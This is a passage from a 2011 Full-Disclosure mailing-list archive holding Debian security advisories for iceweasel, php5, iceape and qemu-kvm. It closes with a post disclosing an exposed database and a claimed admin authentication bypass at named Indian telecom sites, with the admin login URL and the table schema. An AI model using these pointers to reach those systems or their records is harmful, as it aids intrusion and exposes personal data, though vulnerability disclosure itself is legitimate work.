CVE-2011-2362

   David Chan discovered that cookies were insufficiently isolated.

CVE-2011-2371

   Chris Rohlf and Yan Ivnitskiy discovered an integer overflow in the
   Javascript engine, which could lead to the execution of arbitrary
   code.

CVE-2011-2373

   Martin Barbella discovered a use-after-free in XUL processing,
   which could lead to the execution of arbitrary code.

CVE-2011-2374

   Bob Clary, Kevin Brosnan, Nils, Gary Kwong, Jesse Ruderman and
   Christian Biesinger discovered memory corruption bugs, which may 
   lead to the execution of arbitrary code.

CVE-2011-2376

   Luke Wagner and Gary Kwong discovered memory corruption bugs, which
   may lead to the execution of arbitrary code.

For the oldstable distribution (lenny), this problem has been fixed in
version 1.9.0.19-12 of the xulrunner source package.

For the stable distribution (squeeze), this problem has been fixed in
version 3.5.16-9.

For the unstable distribution (sid), this problem has been fixed in
version 3.5.19-3

For the experimental distribution, this problem has been fixed in
version 5.0-1.

We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4OH94ACgkQXm3vHE4uylrFIwCgifRZEbeEqtJZ2dQ5B0CGpgsa
Y2sAn0PRhH2ZQsACdmA/GEI3qyeeWQXH
=LaSN
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 2262-2] php5 update

2011-07-01 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2266-2   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 01, 2011  http://www.debian.org/security/faq
- -

Package: php5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-2531 CVE-2011-0420 CVE-2011-0421 CVE-2011-0708 
 CVE-2011-1153 CVE-2011-1466 CVE-2011-1471 CVE-2011-2202 

The update for CVE-2010-2531 for the old stabledistribution (lenny)
introduced a regression, which lead to additional output being written
to stdout. 

For the oldstable distribution (lenny), this problem has been fixed in
version 5.2.6.dfsg.1-1+lenny13.

We recommend that you upgrade your php5 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4OJxgACgkQXm3vHE4uylp0jQCgs0jPrL2AOQvuGit/G8LJxZp/
iz0An2HC02GzKHv3n+IMc7oHuJfBkFZ7
=qqsQ
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 2269-1] iceape security update

2011-07-01 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2269-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 01, 2011  http://www.debian.org/security/faq
- -

Package: iceape
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-0083 CVE-2011-0085 CVE-2011-2362 CVE-2011-2363 
 CVE-2011-2365 CVE-2011-2371 CVE-2011-2373 CVE-2011-2374 
CVE-2011-2376 

Several vulnerabilities have been found in the Iceape internet suite, an
unbranded version of Seamonkey:

CVE-2011-0083 / CVE-2011-2363

   regenrecht discovered two use-after-frees in SVG processing,
   which could lead to the execution of arbitrary code.

CVE-2011-0085

   regenrecht discovered a use-after-free in XUL processing, which
   could lead to the execution of arbitrary code.

CVE-2011-2362

   David Chan discovered that cookies were insufficiently isolated.

CVE-2011-2371

   Chris Rohlf and Yan Ivnitskiy discovered an integer overflow in the
   Javascript engine, which could lead to the execution of arbitrary
   code.

CVE-2011-2373

   Martin Barbella discovered a use-after-free in XUL processing,
   which could lead to the execution of arbitrary code.

CVE-2011-2374

   Bob Clary, Kevin Brosnan, Nils, Gary Kwong, Jesse Ruderman and
   Christian Biesinger discovered memory corruption bugs, which may
   lead to the execution of arbitrary code.

CVE-2011-2376

   Luke Wagner and Gary Kwong discovered memory corruption bugs, which
   may lead to the execution of arbitrary code.


The oldstable distribution (lenny) is not affected. The iceape
package only provides the XPCOM code.

For the stable distribution (squeeze), this problem has been fixed in
version 2.0.11-6.

For the unstable distribution (sid), this problem has been fixed in
version 2.0.14-3.

We recommend that you upgrade your iceape packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4OKu4ACgkQXm3vHE4uylraKACgnQFTacJ4T4r3jU97BIC+tAzg
W7cAoNh5W0sw3o0En/e3W6sn5MlnAzr+
=9nDO
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 2270-1] qemu-kvm security update

2011-07-01 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2270-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
July 01, 2011  http://www.debian.org/security/faq
- -

Package: qemu-kvm
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE ID : CVE-2011-2512 
Debian Bug : 631975

It was discovered that incorrect sanitising of virtio queue commands in 
KVM, a solution for full virtualization on x86 hardware, could lead to 
denial of service of the execution of arbitrary code.


The oldstable distribution (lenny) is not affected by this problem.

For the stable distribution (squeeze), this problem has been fixed in
version 0.12.5+dfsg-5+squeeze4.

For the unstable distribution (sid), this problem has been fixed in
version 0.14.1+dfsg-2.

We recommend that you upgrade your qemu-kvm packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk4OMwwACgkQXm3vHE4uylpF1wCgr/yYBC/EzaMDMfZV6qWAu0ZQ
8WYAoK/FvSNWCu24VljNhlPxZmyDghOU
=onSM
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Calcuttatelephones.com Database Disclosure, BSNL- Dotsoft (Super Admin) Auth Bypass Vulnerability

2011-07-01 Thread Pradip Sharma
Calcuttatelephones.com Database Disclosure, Directory Listing
http://www.calcuttatelephones.com http://www.calcuttatelephones.com/jto/

Demo:
http://www.flickr.com/photos/64621175@N03/5885441132/in/photostream/

Database containing 2600 plus records.

phpMyAdmin SQL Dump
version 2.5.7-pl1http://www.phpmyadmin.net

Host: localhost
Server version: 4.0.26
PHP Version: 4.2.0

Database : `bsnl`

---
 Table structure for table `jtoresult`

DROP TABLE IF EXISTS `jtoresult`;
CREATE TABLE `jtoresult` (
  `roll_no` varchar(40) NOT NULL default '',
  `circle_appear` varchar(60) NOT NULL default '',
  `name` varchar(150) NOT NULL default '',
  `community` varchar(50) NOT NULL default '',
  `ph_status` varchar(20) NOT NULL default '',
  `merit` varchar(20) NOT NULL default '',
  `circle_code` varchar(10) NOT NULL default '',
  PRIMARY KEY  (`roll_no`)
) TYPE=MyISAM;


BSNL- Dotsoft (Super Admin) Auth Bypass Vulnerability

Profile:

*Dotsoft* is an in-house developed software, integrating the Commercial
Activities, Telecom Billing  Accounting, FRS and Directory Enquiry. It has
been implemented  in  *171* SSAs (Districts) across the country.

Company URL:

http://dotsoft.bsnl.co.in/

SUPER ADMIN LOGON:
http://dotsoft.bsnl.co.in/helpdesk/admin.asp

Demo:
http://www.flickr.com/photos/64621175@N03/5884121702/in/photostream
http://www.flickr.com/photos/64621175@N03/5883556231/in/photostream

Pradip Sharma
Cyber Security Research Analysts,
iSolution Software Systems Pvt. Ltd.www.isolutionindia.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/